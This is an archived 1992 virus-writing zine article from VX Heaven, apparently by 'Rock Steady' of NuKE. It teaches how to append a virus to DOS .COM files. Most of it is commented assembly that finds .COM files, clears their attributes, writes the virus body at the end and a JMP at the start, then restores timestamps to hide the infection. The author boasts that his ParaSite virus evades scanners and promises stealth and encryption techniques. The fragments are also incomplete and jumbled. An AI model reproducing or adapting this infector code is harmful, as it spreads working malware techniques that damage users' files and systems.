VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Construction Kit on infecting .COM

Rock Steady
Nuke Info Journal [2]
February 1992

[Back to index] [Comments]

Well I must state my opinion that there are certainly way too many overwriting viruses out here. To help put a Stop to this I will try to explain to you a SIMPLE way to infect COM files at the end of the Program. This routine works if you follow my steps correctly, and I've already used this in my `ParaSite ][' Virus.

Anyhow this is a brief description what the ASM Source will do.

  1. Find a .COM file in the current Directory
  2. Save the Date and File's Attribute.
  3. Save the First 3 Bytes in a Stack
  4. Infect the File & restore new 3 bytes..
  5. Put the OLD date and File Attributes back on


 ; The Simple routine to Search for a .COM File...
 com_files       db      "*.com",0

         mov     ah,4eh          ;point to a *.COM file...
         mov     dx,com_files
         mov     cx,3            ;Attributes with ReadOnly or Hidden
         int     21h             ;is A okay...

         cmp     ax,12h          ;Any files found?
         je      exit            ;If no Files found Exit...
         jmp     found_file
 ; Instead of Exiting here you can make the Virus go and change dir and
 ; look for several other .com files else where... with the help of the
 ; path or simply searching for more <dir>...

         mov     di,[si+file] ;di points to the filename
         push    si
         add     si,file          ;si points to filename...

         mov     ax,offset 4300h  ;get file Attributes...
         mov     dx,si            ;filename in dx..
         int     21h

         mov     file_attrib,cx   ;Save file Attributes.

 file    dw      0
 ; Here we'll set the file attributes to nothing

         mov     ax,offset 4301h    ;To set file Attributes...
         mov     cx,offset 0fffeh   ;Set them to a Normal File
         mov     dx,si              ;filename...
         int     21h

         mov     ax,offset 3d02h    ;Open File to Read/Write.
         mov     dx,si              ;ASCIIZ filename
         int     21h

         jnb     ok                 ;If file was open continue
         jmp     put_old_attrib     ; error happened restore old attribs
                                    ; and quit.
         mov     bx,ax
         mov     ax,offset 5700h    ;Get File Date & Time...
         int     21h

         mov     old_time,cx        ;Save old File Time...
         mov     old_date,dx        ;Save old File Date

 old_time        db      0
 old_date        db      0

 ; here we infect the file... but first we SAVE the first 3 bytes
 ; somewhere in our virus

         mov     ah,3fh          ;Read file...
         mov     cx,3            ;Number of bytes to read
         mov     dx,first_3      ;Save bytes in the buffer
         add     dx,si           ;Filename...
         int     21h

         cmp     ax,3            ;Where 3 bytes read?
         jnz     fix_file        ;If not fix file like before and quit

 first_3     equ     $    ; The First three bytes of the Original File!
             int     20h  ; the virus is infected to.

 ; This moves the File pointer to the END of the file

         mov     ax,offset 4202h
         mov     cx,0
         mov     dx,0
         int     21h
         mov     cx,ax          ;DX:AX is the FILESIZE!
         sub     ax,3           ;subtract three because of file pointer

         add     cx,offset c_len_y
         mov     di,si
         sub     di,offset c_len_x
         mov     [di],cx        ;Modifies the 2nd & 3rd bytes of program

 ; The writes our virus to the file

         mov     ah,40h
         mov     cx,virlength      ;Virus Length
         mov     dx,si             ;File...
         sub     dx,offset codelength  ;Length of virus codes.
         int     21h

         cmp     ax,offset virlength   ;all bytes written?
         jnz     fix_file              ;If no fix file and quit

 ;Moves the file pointer to the beginning of file and write the
 ;3 bytes JMP at the beginning of the file

         mov     ax,offset 4200h
         mov     cx,0
         mov     dx,0
         int     21h
         mov     ah,40h       ;Write to file...
         mov     cx,3         ;# of bytes to write...
         mov     dx,si        ;File name...
         add     dx,jump      ;Point to the new JMP statement
         int     21h

 jump    db      0e9h    ;This is the JMP that will be put in the
                         ;Begining of the file!

 ;Restore Old File Time & Date

         mov     dx,old_date     ;Old File Date
         mov     cx,old_time     ;Old file Time...
         and     cx,offset 0ffe0h ;Flat Attribs.
         mov     ax,offset 5701h
         int     21h

         mov     ah,3eh
         int     21h             ;Close file...

 ; Here we'll restore the old file attributes...

         mov     ax,offset 4301h
         mov     cx,old_att      ;old File Attributes.
         mov     dx,si           ;Filename...
         int     21h

 ;----------------------------- EnD -------------------------------------

Anyhow that's it... Simple no? This source was also used in my ParaSite ][ Virus that is still undetectable to date with Scanv85. Anyhow I even made it more simpler than my real sources that have to play with the file paths.

Anyhow theres still work to be done, like you must restore the old data file so it will jump to 100h and run the old file the virus was infected too! Remember to store them in the beginning and then restore them! Anyhow there's a few Variables to be put in like `VirLength' which you should know how to do that also the `CodeLength' that is the VIRUS codes ONLY not counting the Stacks.

Anyhow This works FINE with a Non-Resident Virus. Because a few statements would have to be edited for TSRs. Anyhow try to use this, it's small neat and fast.

Anyhow Perhaps next issue I will develop a SIMPLE Ram-Resident virus that infects COMs and EXEs to be released into the next issue! Though I just release this sources for you to learn! Rather than putting you name on my virus and releasing another strain on work I worked Hard upon! Anyhow I should release a SIMPLE new Virus source for all you programmers out there! And I will even explain a few stealth Technics like how to hide your program in memory right under the TOM.

If there's Any Questions you want to know, please ask them I will answer them in the next [NuKE] Releases... I may even release source codes on how to make an Algorithm encryption method! I've developed one on my own, without the V2PX viruses sources... Anyhow it does the job and the formula I developed has an UNLIMITED amount of encryption methods! But since the virus codes have to be SMALL Like close to 2,000 bytes I will limit the formula to about 1,000 different combinations!

By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! aka